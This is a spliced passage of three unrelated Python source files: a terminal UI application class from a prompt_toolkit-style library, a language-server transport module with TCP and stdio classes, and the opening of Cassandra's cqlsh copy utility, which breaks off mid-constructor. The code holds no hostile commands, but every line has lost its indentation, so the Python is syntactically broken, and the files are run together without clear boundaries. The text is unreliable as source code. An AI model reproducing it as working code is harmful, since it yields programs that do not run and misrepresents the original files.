"""
The currently focused :class:`~.Buffer`.
(This returns a dummy :class:`.Buffer` when none of the actual buffers
has the focus. In this case, it's really not practical to check for
`None` values or catch exceptions every time.)
"""
return self.layout.current_buffer or Buffer(
name="dummy-buffer"
) # Dummy buffer.
@property
def current_search_state(self) -> SearchState:
"""
Return the current :class:`.SearchState`. (The one for the focused
:class:`.BufferControl`.)
"""
ui_control = self.layout.current_control
if isinstance(ui_control, BufferControl):
return ui_control.search_state
else:
return SearchState() # Dummy search state. (Don't return None!)
def reset(self) -> None:
"""
Reset everything, for reading the next input.
"""
# Notice that we don't reset the buffers. (This happens just before
# returning, and when we have multiple buffers, we clearly want the
# content in the other buffers to remain unchanged between several
# calls of `run`. (And the same is true for the focus stack.)
self.exit_style = ""
self.background_tasks: List[Task[None]] = []
self.renderer.reset()
self.key_processor.reset()
self.layout.reset()
self.vi_state.reset()
self.emacs_state.reset()
# Trigger reset event.
self.on_reset.fire()
# Make sure that we have a 'focusable' widget focused.
# (The `Layout` class can't determine this.)
layout = self.layout
if not layout.current_control.is_focusable():
for w in layout.find_all_windows():
if w.content.is_focusable():
layout.current_window = w
break
def invalidate(self) -> None:
"""
Thread safe way of sending a repaint trigger to the input event loop.
"""
if not self._is_running:
return
# `invalidate()` called if we don't have a loop yet (not running?), or
# after the event loop was closed.
if self.loop is None or self.loop.is_closed():
return
# Never schedule a second redraw, when a previous one has not yet been
# executed. (This should protect against other threads calling
# 'invalidate' many times, resulting in 100% CPU.)
if self._invalidated:
return
else:
self._invalidated = True
# Trigger event.
self.loop.call_soon_threadsafe(self.on_invalidate.fire)
def redraw() -> None:
self._invalidated = False
self._redraw()
def schedule_redraw() -> None:
call_soon_threadsafe(
redraw, max_postpone_time=self.max_render_postpone_time, loop=self.loop
)
if self.min_redraw_interval:
# When a minimum redraw interval is set, wait minimum this amount
# of time between redraws.
diff = time.time() - self._last_redraw_time
if diff < self.min_redraw_interval:
async def redraw_in_future() -> None:
await sleep(cast(float, self.min_redraw_interval) - diff)
schedule_redraw()
self.loop.call_soon_threadsafe(
lambda: self.create_background_task(redraw_in_future())
)
else:
schedule_redraw()
else:
schedule_redraw()
@property
def invalidated(self) -> bool:
"True when a redraw operation has been scheduled."
return self._invalidated
def _redraw(self, render_as_done: bool = False) -> None:
"""
Render the command line again. (Not thread safe!) (From other threads,
or if unsure, use :meth:`.Suite.invalidate`.)
:param render_as_done: make sure to put the cursor after the UI.
"""
def run_in_context() -> None:
# Only draw when no sub application was started.
if self._is_running and not self._running_in_terminal:
if self.min_redraw_interval:
self._last_redraw_time = time.time()
# Render
self.render_counter += 1
self.before_render.fire()
if render_as_done:
if self.erase_when_done:
self.renderer.erase()
else:
# Draw in 'done' state and reset renderer.
self.renderer.render(self, self.layout, is_done=render_as_done)
else:
self.renderer.render(self, self.layout)
self.layout.update_parents_relations()
# Fire render event.
self.after_render.fire()
self._update_invalidate_events()
# NOTE: We want to make sure this Suite is the active one. The
# invalidate function is often called from a context where this
# application is not the active one. (Like the
# `PromptSession._auto_refresh_context`).
# We copy the context in case the context was already active, to
# prevent RuntimeErrors. (The rendering is not supposed to change
# any context variables.)
if self.context is not None:
self.context.copy().run(run_in_context)
def _start_auto_refresh_task(self) -> None:
"""
Start a while/true loop in the background for automatic invalidation of
the UI.
"""
if self.refresh_interval is not None and self.refresh_interval != 0:
async def auto_refresh(refresh_interval: float) -> None:
while True:
await sleep(refresh_interval)
self.invalidate()
self.create_background_task(auto_refresh(self.refresh_interval))
def _update_invalidate_events(self) -> None:
"""
Make sure to attach 'invalidate' handlers to all invalidate events in
the UI.
"""
# Remove all the original event handlers. (Components can be removed
# from the UI.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
# Gather all new events.
# (All controls are able to invalidate themselves.)
def gather_events() -> Iterable[Event[object]]:
for c in self.layout.find_all_controls():
for ev in c.get_invalidate_events():
yield ev
self._invalidate_events = list(gather_events())
for ev in self._invalidate_events:
ev += self._invalidate_handler
def _invalidate_handler(self, sender: object) -> None:
"""
Handler for invalidate events coming from UIControls.
(This handles the difference in signature between event handler and
`self.invalidate`. It also needs to be a method -not a nested
function-, so that we can remove it again .)
"""
self.invalidate()
def _on_resize(self) -> None:
"""
When the window size changes, we erase the current output and request
again the cursor position. When the CPR answer arrives, the output is
drawn again.
"""
# Erase, request position (when cursor is at the start position)
# and redraw again. -- The order is important.
self.renderer.erase(leave_alternate_screen=False)
self._request_absolute_cursor_position()
self._redraw()
def _pre_run(self, pre_run: Optional[Callable[[], None]] = None) -> None:
"""
Called during `run`.
`self.future` should be set to the new future at the point where this
is called in order to avoid data races. `pre_run` can be used to set a
`threading.Event` to synchronize with UI termination code, running in
another thread that would call `Suite.exit`. (See the progress
bar code for an example.)
"""
if pre_run:
pre_run()
# Process registered "pre_run_callables" and clear list.
for c in self.pre_run_callables:
c()
del self.pre_run_callables[:]
async def run_async(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
) -> _AppResult:
"""
Run the quo :class:`~quo.application.Suite`
until :meth:`~quo.application.Suite.exit` has been
called. Return the value that was passed to
:meth:`~quo.application.Suite.exit`.
This is the main entry point for a prompt_toolkit
:class:`~quo.application.Suite` and usually the only
place where the event loop is actually running.
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
"""
assert not self._is_running, "Suite is already running."
async def _run_async() -> _AppResult:
"Coroutine."
loop = get_event_loop()
f = loop.create_future()
self.future = f # XXX: make sure to set this before calling '_redraw'.
self.loop = loop
self.context = contextvars.copy_context()
# Counter for cancelling 'flush' timeouts. Every time when a key is
# pressed, we start a 'flush' timer for flushing our escape key. But
# when any subsequent input is received, a new timer is started and
# the current timer will be ignored.
flush_task: Optional[asyncio.Task[None]] = None
# Reset.
# (`self.future` needs to be set when `pre_run` is called.)
self.reset()
self._pre_run(pre_run)
# Feed type ahead input first.
self.key_processor.feed_multiple(get_typeahead(self.input))
self.key_processor.process_keys()
def read_from_input() -> None:
nonlocal flush_task
# Ignore when we aren't running anymore. This callback will
# removed from the loop next time. (It could be that it was
# still in the 'tasks' list of the loop.)
# Except: if we need to process incoming CPRs.
if not self._is_running and not self.renderer.waiting_for_cpr:
return
# Get keys from the input object.
keys = self.input.read_keys()
# Feed to key processor.
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
# Quit when the input stream was closed.
if self.input.closed:
if not f.done():
f.set_exception(EOFError)
else:
# Automatically flush keys.
if flush_task:
flush_task.cancel()
flush_task = self.create_background_task(auto_flush_input())
async def auto_flush_input() -> None:
# Flush input after timeout.
# (Used for flushing the enter key.)
# This sleep can be cancelled, in that case we won't flush yet.
await sleep(self.ttimeoutlen)
flush_input()
def flush_input() -> None:
if not self.is_done:
# Get keys, and feed to key processor.
keys = self.input.flush_keys()
self.key_processor.feed_multiple(keys)
self.key_processor.process_keys()
if self.input.closed:
f.set_exception(EOFError)
# Enter raw mode, attach input and attach WINCH event handler.
with self.input.raw_mode(), self.input.attach(
read_from_input
), attach_winch_signal_handler(self._on_resize):
self.create_background_task(self._poll_output_size())
# Draw UI.
self._request_absolute_cursor_position()
self._redraw()
self._start_auto_refresh_task()
# Wait for UI to finish.
try:
result = await f
finally:
# In any case, when the application finishes.
# (Successful, or because of an error.)
try:
self._redraw(render_as_done=True)
finally:
# _redraw has a good chance to fail if it calls widgets
# with bad code. Make sure to reset the renderer
# anyway.
self.renderer.reset()
# Unset `is_running`, this ensures that possibly
# scheduled draws won't paint during the following
# yield.
self._is_running = False
# Detach event handlers for invalidate events.
# (Important when a UIControl is embedded in multiple
# applications, like ptterm in pymux. An invalidate
# should not trigger a repaint in terminated
# applications.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
self._invalidate_events = []
# Wait for CPR responses.
if self.output.responds_to_cpr:
await self.renderer.wait_for_cpr_responses()
# Wait for the run-in-terminals to terminate.
previous_run_in_terminal_f = self._running_in_terminal_f
if previous_run_in_terminal_f:
await previous_run_in_terminal_f
# Store unprocessed input as typeahead for next time.
store_typeahead(self.input, self.key_processor.empty_queue())
return result
async def _run_async2() -> _AppResult:
self._is_running = True
# Make sure to set `_invalidated` to `False` to begin with,
# otherwise we're not going to paint anything. This can happen if
# this application had run before on a different event loop, and a
# paint was scheduled using `call_soon_threadsafe` with
# `max_postpone_time`.
self._invalidated = False
loop = get_event_loop()
if set_exception_handler:
previous_exc_handler = loop.get_exception_handler()
loop.set_exception_handler(self._handle_exception)
try:
with set_app(self):
try:
result = await _run_async()
finally:
# Wait for the background tasks to be done. This needs to
# go in the finally! If `_run_async` raises
# `KeyboardInterrupt`, we still want to wait for the
# background tasks.
await self.cancel_and_wait_for_background_tasks()
# Set the `_is_running` flag to `False`. Normally this
# happened already in the finally block in `run_async`
# above, but in case of exceptions, that's not always the
# case.
self._is_running = False
# Also remove the Future again. (This brings the
# application back to its initial state, where it also
# doesn't have a Future.)
self.future = None
return result
finally:
if set_exception_handler:
loop.set_exception_handler(previous_exc_handler)
return await _run_async2()
def run(
self,
pre_run: Optional[Callable[[], None]] = None,
set_exception_handler: bool = True,
in_thread: bool = False,
) -> _AppResult:
"""
A blocking 'run' call that waits until the UI is finished.
This will start the current asyncio event loop. If no loop is set for
the current thread, then it will create a new loop. If a new loop was
created, this won't close the new loop (if `in_thread=False`).
:param pre_run: Optional callable, which is called right after the
"reset" of the application.
:param set_exception_handler: When set, in case of an exception, go out
of the alternate screen and hide the application, display the
exception, and wait for the user to press ENTER.
:param in_thread: When true, run the application in a background
thread, and block the current thread until the application
terminates. This is useful if we need to be sure the application
won't use the current event loop (asyncio does not support nested
event loops). A new event loop will be created in this background
thread, and that loop will also be closed when the background
thread terminates. When this is used, it's especially important to
make sure that all asyncio background tasks are managed through
`get_appp().create_background_task()`, so that unfinished tasks are
properly cancelled before the event loop is closed. This is used
for instance in ptpython.
"""
if in_thread:
result: _AppResult
exception: Optional[BaseException] = None
def run_in_thread() -> None:
nonlocal result, exception
try:
result = self.run(
pre_run=pre_run, set_exception_handler=set_exception_handler
)
except BaseException as e:
exception = e
finally:
# Make sure to close the event loop in this thread. Running
# the application creates a new loop (because we're in
# another thread), but it doesn't get closed automatically
# (also not by the garbage collector).
loop = get_event_loop()
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
thread = threading.Thread(target=run_in_thread)
thread.start()
thread.join()
if exception is not None:
raise exception
return result
# We don't create a new event loop by default, because we want to be
# sure that when this is called multiple times, each call of `run()`
# goes through the same event loop. This way, users can schedule
# background-tasks that keep running across multiple prompts.
try:
loop = get_event_loop()
except RuntimeError:
# Possibly we are not running in the main thread, where no event
# loop is set by default. Or somebody called `asyncio.run()`
# before, which closes the existing event loop. We can create a new
# loop.
loop = new_event_loop()
set_event_loop(loop)
return loop.run_until_complete(
self.run_async(pre_run=pre_run, set_exception_handler=set_exception_handler)
)
def _handle_exception(
self, loop: AbstractEventLoop, context: Dict[str, Any]
) -> None:
"""
Handler for event loop exceptions.
This will print the exception, using run_in_terminal.
"""
# For Python 2: we have to get traceback at this point, because
# we're still in the 'except:' block of the event loop where the
# traceback is still available. Moving this code in the
# 'print_exception' coroutine will loose the exception.
tb = get_traceback_from_context(context)
formatted_tb = "".join(format_tb(tb))
async def in_term() -> None:
async with in_terminal():
# Print output. Similar to 'loop.default_exception_handler',
# but don't use logger. (This works better on Python 2.)
echo(f"Unhandled ", nl=False)
echo(f"exception", fg="black", bg="yellow", nl=False)
echo(f"in the event loop:")
echo(formatted_tb)
print("Exception %s" % (context.get("exception"),))
await _do_wait_for_enter("Press ENTER to continue...")
ensure_future(in_term())
def create_background_task(
self, coroutine: Awaitable[None]
) -> "asyncio.Task[None]":
"""
Start a background task (coroutine) for the running application. When
the `Suite` terminates, unfinished background tasks will be
cancelled.
If asyncio had nurseries like Trio, we would create a nursery in
`Suite.run_async`, and run the given coroutine in that nursery.
Not threadsafe.
"""
task = get_event_loop().create_task(coroutine)
self.background_tasks.append(task)
return task
async def cancel_and_wait_for_background_tasks(self) -> None:
"""
Cancel all background tasks, and wait for the cancellation to be done.
If any of the background tasks raised an exception, this will also
propagate the exception.
(If we had nurseries like Trio, this would be the `__aexit__` of a
nursery.)
"""
for task in self.background_tasks:
task.cancel()
for task in self.background_tasks:
try:
await task
except CancelledError:
pass
async def _poll_output_size(self) -> None:
"""
Coroutine for polling the terminal dimensions.
Useful for situations where `attach_winch_signal_handler` is not sufficient:
- If we are not running in the main thread.
- On Windows.
"""
size: Optional[Size] = None
interval = self.terminal_size_polling_interval
if interval is None:
return
while True:
await asyncio.sleep(interval)
new_size = self.output.get_size()
if size is not None and new_size != size:
self._on_resize()
size = new_size
def cpr_not_supported_callback(self) -> None:
"""
Called when we don't receive the cursor position response in time.
"""
if not self.output.responds_to_cpr:
return # We know about this already.
def in_terminal() -> None:
self.output.write(
"WARNING: your terminal doesn't support cursor position requests (CPR).\r\n"
)
self.output.flush()
run_in_terminal(in_terminal)
@overload
def exit(self) -> None:
"Exit without arguments."
@overload
def exit(self, *, result: _AppResult, style: str = "") -> None:
"Exit with `_AppResult`."
@overload
def exit(
self, *, exception: Union[BaseException, Type[BaseException]], style: str = ""
) -> None:
"Exit with exception."
def exit(
self,
result: Optional[_AppResult] = None,
exception: Optional[Union[BaseException, Type[BaseException]]] = None,
style: str = "",
) -> None:
"""
Exit application.
.. note::
If `Suite.exit` is called before `Suite.run()` is
called, then the `Suite` won't exit (because the
`Suite.future` doesn't correspond to the current run). Use a
`pre_run` hook and an event to synchronize the closing if there's a
chance this can happen.
:param result: Set this result for the application.
:param exception: Set this exception as the result for an application. For
a prompt, this is often `EOFError` or `KeyboardInterrupt`.
:param style: Apply this style on the whole content when quitting,
often this is 'class:exiting' for a prompt. (Used when
`erase_when_done` is not set.)
"""
assert result is None or exception is None
if self.future is None:
raise Exception("Suite is not running. Suite.exit() failed.")
if self.future.done():
raise Exception("Return value already set. Suite.exit() failed.")
self.exit_style = style
if exception is not None:
self.future.set_exception(exception)
else:
self.future.set_result(cast(_AppResult, result))
def _request_absolute_cursor_position(self) -> None:
"""
Send CPR request.
"""
# Note: only do this if the input queue is not empty, and a return
# value has not been set. Otherwise, we won't be able to read the
# response anyway.
if not self.key_processor.input_queue and not self.is_done:
self.renderer.request_absolute_cursor_position()
async def run_system_command(
self,
command: str,
wait_for_enter: bool = True,
display_before_text: AnyFormattedText = "",
wait_text: str = "Press ENTER to continue...",
) -> None:
"""
Run system command (While hiding the prompt. When finished, all the
output will scroll above the prompt.)
:param command: Shell command to be executed.
:param wait_for_enter: FWait for the user to press enter, when the
command is finished.
:param display_before_text: If given, text to be displayed before the
command executes.
:return: A `Future` object.
"""
async with in_terminal():
# Try to use the same input/output file descriptors as the one,
# used to run this application.
try:
input_fd = self.input.fileno()
except AttributeError:
input_fd = sys.stdin.fileno()
try:
output_fd = self.output.fileno()
except AttributeError:
output_fd = sys.stdout.fileno()
# Run sub process.
def run_command() -> None:
self.print_text(display_before_text)
p = Popen(command, shell=True, stdin=input_fd, stdout=output_fd)
p.wait()
await run_in_executor_with_context(run_command)
# Wait for the user to press enter.
if wait_for_enter:
await _do_wait_for_enter(wait_text)
def suspend_to_background(self, suspend_group: bool = True) -> None:
"""
(Not thread safe -- to be called from inside the key bindings.)
Suspend process.
:param suspend_group: When true, suspend the whole process group.
(This is the default, and probably what you want.)
"""
# Only suspend when the operating system supports it.
# (Not on Windows.)
if _SIGTSTP is not None:
def run() -> None:
# Send `SIGTSTP` to own process.
# This will cause it to suspend.
# Usually we want the whole process group to be suspended. This
# handles the case when input is piped from another process.
if suspend_group:
os.kill(0, _SIGTSTP)
else:
os.kill(os.getpid(), _SIGTSTP)
run_in_terminal(run)
def print_text(
self, text: AnyFormattedText, style: Optional[BaseStyle] = None
) -> None:
"""
Print a list of (style_str, text) tuples to the output.
(When the UI is running, this method has to be called through
`run_in_terminal`, otherwise it will destroy the UI.)
:param text: List of ``(style_str, text)`` tuples.
:param style: Style class to use. Defaults to the active style in the CLI.
"""
print_formatted_text(
output=self.output,
formatted_text=text,
style=style or self._merged_style,
color_depth=self.color_depth,
style_transformation=self.style_transformation,
)
@property
def is_running(self) -> bool:
"`True` when the application is currently active/running."
return self._is_running
@property
def is_done(self) -> bool:
if self.future:
return self.future.done()
return False
def get_used_style_strings(self) -> List[str]:
"""
Return a list of used style strings. This is helpful for debugging, and
for writing a new `Style`.
"""
attrs_for_style = self.renderer._attrs_for_style
if attrs_for_style:
return sorted(
[
re.sub(r"\s+", " ", style_str).strip()
for style_str in attrs_for_style.keys()
]
)
return []
class _CombinedRegistry(KeyBindingsBase):
"""
The `KeyBindings` of key bindings for a `Suite`.
This merges the global key bindings with the one of the current user
control.
"""
def __init__(self, app: Suite[_AppResult]) -> None:
self.app = app
self._cache: SimpleCache[
Tuple[Window, FrozenSet[UIControl]], KeyBindingsBase
] = SimpleCache()
@property
def _version(self) -> Hashable:
"""Not needed - this object is not going to be wrapped in another
KeyBindings object."""
raise NotImplementedError
def bindings(self) -> List[Binding]:
"""Not needed - this object is not going to be wrapped in another
KeyBindings object."""
raise NotImplementedError
def _create_key_bindings(
self, current_window: Window, other_controls: List[UIControl]
) -> KeyBindingsBase:
"""
Create a `KeyBinder` object that merges the `KeyBindings` from the
`UIControl` with all the parent controls and the global key bindings.
"""
key_bindings = []
collected_containers = set()
# Collect key bindings from currently focused control and all parent
# controls. Don't include key bindings of container parent controls.
container: Container = current_window
while True:
collected_containers.add(container)
kb = container.get_key_bindings()
if kb is not None:
key_bindings.append(kb)
if container.is_modal():
break
parent = self.app.layout.get_parent(container)
if parent is None:
break
else:
container = parent
# Include global bindings (starting at the top-model container).
for c in walk(container):
if c not in collected_containers:
kb = c.get_key_bindings()
if kb is not None:
key_bindings.append(GlobalOnlyKeyBindings(kb))
# Add App key bindings
if self.app.key_bindings:
key_bindings.append(self.app.key_bindings)
# Add mouse bindings.
key_bindings.append(
ConditionalKeyBindings(
self.app._page_navigation_bindings,
self.app.enable_page_navigation_bindings,
)
)
key_bindings.append(self.app._default_bindings)
# Reverse this list. The current control's key bindings should come
# last. They need priority.
key_bindings = key_bindings[::-1]
return merge_key_bindings(key_bindings)
@property
def _key_bindings(self) -> KeyBindingsBase:
current_window = self.app.layout.current_window
other_controls = list(self.app.layout.find_all_controls())
key = current_window, frozenset(other_controls)
return self._cache.get(
key, lambda: self._create_key_bindings(current_window, other_controls)
)
def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_for_keys(keys)
def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]:
return self._key_bindings.get_bindings_starting_with_keys(keys)
async def _do_wait_for_enter(wait_text: AnyFormattedText) -> None:
"""
Create a sub application to wait for the enter key press.
This has two advantages over using 'input'/'raw_input':
- This will share the same input/output I/O.
- This doesn't block the event loop.
"""
from quo.shortcuts import Prompt
from quo.keys import KeyBinder
key_bindings = KeyBinder()
@key_bindings.add("enter")
def _ok(event: E) -> None:
event.app.exit()
@key_bindings.add(Keys.Any)
def _ignore(event: E) -> None:
"Disallow typing."
pass
session: Prompt[None] = Prompt(
text=wait_text, key_bindings=key_bindings
)
await session.app.run_async()
@contextmanager
def attach_winch_signal_handler(
handler: Callable[[], None]
) -> Generator[None, None, None]:
"""
Attach the given callback as a WINCH signal handler within the context
manager. Restore the original signal handler when done.
The `Suite.run` method will register SIGWINCH, so that it will
properly repaint when the terminal window resizes. However, using
`run_in_terminal`, we can temporarily send an application to the
background, and run an other app in between, which will then overwrite the
SIGWINCH. This is why it's important to restore the handler when the app
terminates.
"""
# The tricky part here is that signals are registered in the Unix event
# loop with a wakeup fd, but another application could have registered
# signals using signal.signal directly. For now, the implementation is
# hard-coded for the `asyncio.unix_events._UnixSelectorEventLoop`.
# No WINCH? Then don't do anything.
sigwinch = getattr(signal, "SIGWINCH", None)
if sigwinch is None or not in_main_thread():
yield
return
# Keep track of the previous handler.
# (Only UnixSelectorEventloop has `_signal_handlers`.)
loop = asyncio.get_event_loop()
previous_winch_handler = getattr(loop, "_signal_handlers", {}).get(sigwinch)
try:
loop.add_signal_handler(sigwinch, handler)
yield
finally:
# Restore the previous signal handler.
loop.remove_signal_handler(sigwinch)
if previous_winch_handler is not None:
loop.add_signal_handler(
sigwinch,
previous_winch_handler._callback,
*previous_winch_handler._args,
)
|
transports.py | from abc import ABCMeta, abstractmethod
import threading
import time
import socket
from queue import Queue
import subprocess
from .logging import exception_log, debug
try:
from typing import Callable, Dict, Any, Optional
assert Callable and Dict and Any and Optional and subprocess
except ImportError:
pass
ContentLengthHeader = b"Content-Length: "
TCP_CONNECT_TIMEOUT = 5
try:
from typing import Any, Dict, Callable
assert Any and Dict and Callable
except ImportError:
pass
class Transport(object, metaclass=ABCMeta):
@abstractmethod
def __init__(self) -> None:
pass
@abstractmethod
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
pass
@abstractmethod
def send(self, message: str) -> None:
pass
STATE_HEADERS = 0
STATE_CONTENT = 1
def start_tcp_transport(port: int, host: 'Optional[str]'=None) -> 'Transport':
start_time = time.time()
debug('connecting to {}:{}'.format(host or "localhost", port))
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
sock = socket.create_connection((host or "localhost", port))
return TCPTransport(sock)
except ConnectionRefusedError as e:
pass
# process.kill()
raise Exception("Timeout connecting to socket")
class TCPTransport(Transport):
def __init__(self, socket: 'Any') -> None:
self.socket = socket # type: 'Optional[Any]'
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.read_thread = threading.Thread(target=self.read_socket)
self.read_thread.start()
self.write_thread = threading.Thread(target=self.write_socket)
self.write_thread.start()
def close(self) -> None:
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.socket = None
self.on_closed()
def read_socket(self) -> None:
remaining_data = b""
is_incomplete = False
read_state = STATE_HEADERS
content_length = 0
while self.socket:
is_incomplete = False
try:
received_data = self.socket.recv(4096)
except Exception as err:
exception_log("Failure reading from socket", err)
self.close()
break
if not received_data:
debug("no data received, closing")
self.close()
break
data = remaining_data + received_data
remaining_data = b""
while len(data) > 0 and not is_incomplete:
if read_state == STATE_HEADERS:
headers, _sep, rest = data.partition(b"\r\n\r\n")
if len(_sep) < 1:
is_incomplete = True
remaining_data = data
else:
for header in headers.split(b"\r\n"):
if header.startswith(ContentLengthHeader):
header_value = header[len(ContentLengthHeader):]
content_length = int(header_value)
read_state = STATE_CONTENT
data = rest
if read_state == STATE_CONTENT:
# read content bytes
if len(data) >= content_length:
content = data[:content_length]
self.on_receive(content.decode("UTF-8"))
data = data[content_length:]
read_state = STATE_HEADERS
else:
is_incomplete = True
remaining_data = data
def send(self, message: str) -> None:
self.send_queue.put(message)
def write_socket(self) -> None:
while self.socket:
message = self.send_queue.get()
if message is None:
break
else:
try:
self.socket.sendall(bytes(message, 'UTF-8'))
except Exception as err:
exception_log("Failure writing to socket", err)
self.close()
class StdioTransport(Transport):
def __init__(self, process: 'subprocess.Popen') -> None:
self.process = process # type: Optional[subprocess.Popen]
self.send_queue = Queue() # type: Queue[Optional[str]]
def start(self, on_receive: 'Callable[[str], None]', on_closed: 'Callable[[], None]') -> None:
self.on_receive = on_receive
self.on_closed = on_closed
self.write_thread = threading.Thread(target=self.write_stdin)
self.write_thread.start()
self.read_thread = threading.Thread(target=self.read_stdout)
self.read_thread.start()
def close(self) -> None:
self.process = None
self.send_queue.put(None) # kill the write thread as it's blocked on send_queue
self.on_closed()
def read_stdout(self) -> None:
"""
Reads JSON responses from process and dispatch them to response_handler
"""
ContentLengthHeader = b"Content-Length: "
running = True
while running and self.process:
running = self.process.poll() is None
try:
content_length = 0
while self.process:
header = self.process.stdout.readline()
if header:
header = header.strip()
if not header:
break
if header.startswith(ContentLengthHeader):
content_length = int(header[len(ContentLengthHeader):])
if (content_length > 0):
content = self.process.stdout.read(content_length)
self.on_receive(content.decode("UTF-8"))
except IOError as err:
self.close()
exception_log("Failure reading stdout", err)
break
debug("LSP stdout process ended.")
def send(self, message: str) -> None:
self.send_queue.put(message)
def write_stdin(self) -> None:
while self.process:
message = self.send_queue.get()
if message is None:
break
else:
try:
self.process.stdin.write(bytes(message, 'UTF-8'))
self.process.stdin.flush()
except (BrokenPipeError, OSError) as err:
exception_log("Failure writing to stdout", err)
self.close()
|
copyutil.py | # cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randint
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg.encode(encoding))
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
None
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception, e:
printmsg('%s: %s' % (e.__class__.__name__, e.message))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
